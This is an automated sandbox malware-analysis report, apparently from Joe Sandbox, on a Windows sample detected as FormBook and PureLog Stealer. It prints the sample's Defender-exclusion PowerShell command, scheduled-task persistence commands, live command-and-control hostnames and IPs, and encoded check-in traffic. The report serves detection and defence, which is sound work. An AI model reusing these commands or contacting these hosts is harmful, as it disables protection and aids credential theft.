Windows Analysis Report
nK1Y86mbzfbkwpB.exe

Overview

General Information

Sample name: nK1Y86mbzfbkwpB.exe
Analysis ID: 1475272
MD5: 3bfca4bfd7cdb0f712e4d362e3b320ff
SHA1: e5b837ee1dd3f31b9685216b9306ab4a7878421e
SHA256: 5e8d9cec59c261ad6e67689490cdd741d56c682cbe9a4c90668f77ffb6f5cb05
Tags: exe

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses runas.exe to run programs with elevated privileges
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • nK1Y86mbzfbkwpB.exe (PID: 5040 cmdline: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe" MD5: 3BFCA4BFD7CDB0F712E4D362E3B320FF)
    • powershell.exe (PID: 3328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5268 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7024 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 3300 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • hAtMBptzWt.exe (PID: 3172 cmdline: "C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runas.exe (PID: 6888 cmdline: "C:\Windows\SysWOW64\runas.exe" MD5: 13646BC81C39130487DA538B2DED5B28)
          • hAtMBptzWt.exe (PID: 5316 cmdline: "C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6704 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • GDhinOc.exe (PID: 6420 cmdline: C:\Users\user\AppData\Roaming\GDhinOc.exe MD5: 3BFCA4BFD7CDB0F712E4D362E3B320FF)
    • schtasks.exe (PID: 2988 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 2320 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 6264 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 4904 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • hAtMBptzWt.exe (PID: 5372 cmdline: "C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runas.exe (PID: 7100 cmdline: "C:\Windows\SysWOW64\runas.exe" MD5: 13646BC81C39130487DA538B2DED5B28)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2b8d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1438f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.2183096912.0000000005370000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2b8d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1438f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
(20 further entries not shown in this view)

Source | Rule | Description | Author | Strings
0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.nK1Y86mbzfbkwpB.exe.5370000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
7.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
7.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2dd73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16832:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
7.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(1 further entry not shown in this view)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe", ParentImage: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe, ParentProcessId: 5040, ParentProcessName: nK1Y86mbzfbkwpB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", ProcessId: 3328, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe", ParentImage: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe, ParentProcessId: 5040, ParentProcessName: nK1Y86mbzfbkwpB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", ProcessId: 3328, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\GDhinOc.exe, ParentImage: C:\Users\user\AppData\Roaming\GDhinOc.exe, ParentProcessId: 6420, ParentProcessName: GDhinOc.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp", ProcessId: 2988, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe", ParentImage: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe, ParentProcessId: 5040, ParentProcessName: nK1Y86mbzfbkwpB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", ProcessId: 7024, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe", ParentImage: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe, ParentProcessId: 5040, ParentProcessName: nK1Y86mbzfbkwpB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe", ProcessId: 3328, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe", ParentImage: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe, ParentProcessId: 5040, ParentProcessName: nK1Y86mbzfbkwpB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp", ProcessId: 7024, ProcessName: schtasks.exe

Snort IDS alerts:

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
07/17/24-19:00:53.652505 | 2855465 | 63907 | 80 | TCP | A Network Trojan was detected
07/17/24-18:59:57.073970 | 2855465 | 63893 | 80 | TCP | A Network Trojan was detected
07/17/24-19:00:40.312082 | 2855465 | 63902 | 80 | TCP | A Network Trojan was detected
07/17/24-19:00:26.031224 | 2855465 | 63898 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:35.621547+0200 | 2855464 | 63900 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:52.335086+0200 | 2855464 | 63905 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:47.382097+0200 | 2855464 | 63903 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:01:01.582855+0200 | 2855464 | 63908 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:38.233207+0200 | 2855464 | 63901 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:32.577007+0200 | 2855464 | 63899 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:19.259253+0200 | 2855464 | 63895 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:54.774305+0200 | 2855465 | 63907 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:40.778213+0200 | 2855465 | 63902 | 80 | TCP | A Network Trojan was detected
2024-07-17T18:59:57.833169+0200 | 2855465 | 63893 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:01:04.183883+0200 | 2855464 | 63909 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:21.843720+0200 | 2855464 | 63896 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:49.815005+0200 | 2855464 | 63904 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:54.774305+0200 | 2050745 | 63907 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-17T19:00:40.778213+0200 | 2050745 | 63902 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-17T19:00:26.999460+0200 | 2050745 | 63898 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-17T18:59:57.833169+0200 | 2050745 | 63893 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-17T19:00:24.415757+0200 | 2855464 | 63897 | 80 | TCP | A Network Trojan was detected
2024-07-17T19:00:26.999460+0200 | 2855465 | 63898 | 80 | TCP | A Network Trojan was detected

AV Detection

Source: nK1Y86mbzfbkwpB.exe; Avira: detected
Source: C:\Users\user\AppData\Roaming\GDhinOc.exe; Avira: detection malicious, Label: HEUR/AGEN.1362865
Source: C:\Users\user\AppData\Roaming\GDhinOc.exe; ReversingLabs: Detection: 52%
Source: nK1Y86mbzfbkwpB.exe; ReversingLabs: Detection: 52%
Source: Yara match; File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\GDhinOc.exe; Joe Sandbox ML: detected
Source: nK1Y86mbzfbkwpB.exe; Joe Sandbox ML: detected
Source: nK1Y86mbzfbkwpB.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: nK1Y86mbzfbkwpB.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2494695347.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2689518401.0000000001137000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000002.3354731785.0000000001128000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354390333.0000000001318000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hAtMBptzWt.exe, 00000010.00000000.2407457604.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp, hAtMBptzWt.exe, 00000014.00000002.3352923930.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp, hAtMBptzWt.exe, 00000016.00000002.3356664916.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: RegSvcs.pdb, source: runas.exe, 00000011.00000002.3352619446.0000000002807000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3358247281.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000000.2669239142.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2941051604.000000001675C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.2495139011.0000000001460000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2502199934.0000000004329000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.000000000466E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2494898305.0000000004175000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.00000000044D0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2690019481.0000000004A70000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2698618753.0000000004C22000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.2495139011.0000000001460000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000011.00000003.2502199934.0000000004329000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.000000000466E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2494898305.0000000004175000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3357076242.00000000044D0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000002.2785245949.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2690019481.0000000004A70000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000015.00000003.2698618753.0000000004C22000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: runas.exe, 00000011.00000002.3352619446.0000000002807000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3358247281.0000000004AFC000.00000004.10000000.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000016.00000000.2669239142.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2941051604.000000001675C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: runas.pdb source: RegSvcs.exe, 00000007.00000002.2494695347.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2689518401.0000000001137000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000002.3354731785.0000000001128000.00000004.00000020.00020000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354390333.0000000001318000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\runas.exe; Code function: 17_2_023BC330 FindFirstFileW,FindNextFileW,FindClose, 17_2_023BC330
Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe; Code function: 4x nop then jmp 06F7B971h, 0_2_06F7BE73
Source: C:\Windows\SysWOW64\runas.exe; Code function: 4x nop then xor eax, eax, 17_2_023A9B40
Source: C:\Windows\SysWOW64\runas.exe; Code function: 4x nop then pop edi, 17_2_023B255F
Source: C:\Windows\SysWOW64\runas.exe; Code function: 4x nop then mov ebx, 00000004h, 17_2_043704E8

Networking

Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:63893 -> 185.179.189.181:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:63898 -> 172.96.191.69:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:63902 -> 13.248.169.48:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:63907 -> 162.159.134.42:80
Source: Joe Sandbox View; IP Address: 13.248.169.48
Source: Joe Sandbox View; IP Address: 162.159.134.42
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
Source: Joe Sandbox View; ASN Name: WEBHOST1-ASRU
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected:
  GET /midu/?zn6L=9nR4RRbtczDLM92wROaICO8mWeENBuMayS9RmkCU7FdLWzi6Zh5WY9LbBJga/o2cXaf6PRrIolXtwoFpXTr9SyPSPVCys8awhBwFZAVidM2Yj+9OFlKtZImodfdv2xp/fybq7VQ=&BF=AP6PLVoH-l HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.scottifqqy.online
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic; HTTP traffic detected:
  GET /d3vb/?zn6L=ADPQ8lRoxSByg+mG86XNue8ofAjmBVNA7RwbiYYLDlrQv278ITvGwT6pBJPFcJ5Oe9Xpz76I5qFPHvmWTw5Y21ldoEnhDfgwrYz6sOCTt4XHqos0nmhmqCv1SSwJ5dTjY+t3Vmc=&BF=AP6PLVoH-l HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.ancuapengiu28.com
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic; HTTP traffic detected:
  GET /cf3x/?zn6L=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI=&BF=AP6PLVoH-l HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.techacademy.store
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic; HTTP traffic detected:
  GET /qt04/?zn6L=ZjVlSUsngRwEegGDQi0x16PNmn+zvLQLmgMOdCvpj72y/6TLeiZkhB+jDoYQhv+31XsOucKp5ezTLwqyqsfzW87SAnA9l3fp1K+KRcztaDzuPfUxOD0ClFR9lOpz4Z3tTOcJt7Q=&BF=AP6PLVoH-l HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.goodneighbor.club
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic; DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic; DNS traffic detected: DNS query: www.scottifqqy.online
Source: global traffic; DNS traffic detected: DNS query: www.ancuapengiu28.com
Source: global traffic; DNS traffic detected: DNS query: www.techacademy.store
Source: global traffic; DNS traffic detected: DNS query: www.goodneighbor.club
Source: global traffic; DNS traffic detected: DNS query: www.me-sa.online
                Source: unknownHTTP traffic detected: POST /d3vb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.ancuapengiu28.comOrigin: http://www.ancuapengiu28.comReferer: http://www.ancuapengiu28.com/d3vb/Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 209User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 7a 6e 36 4c 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 73 66 61 33 72 70 61 4d 74 49 41 31 59 6e 33 6a 66 33 46 33 71 32 4e 36 2b 6f 59 49 4b 52 62 61 73 30 48 47 57 54 62 46 79 79 66 54 4c 63 44 48 55 4a 74 77 48 65 36 30 72 63 6d 70 6f 39 56 33 4b 75 36 36 58 54 34 6c 39 55 4a 4a 7a 6a 33 6c 54 75 30 57 6e 59 50 78 70 4d 61 4d 7a 35 37 47 68 4e 38 46 76 45 38 52 31 57 37 54 58 78 55 68 67 50 4c 55 51 38 39 53 44 6a 62 41 34 41 42 2f 70 57 77 32 47 46 43 36 52 59 2f 72 74 32 55 7a 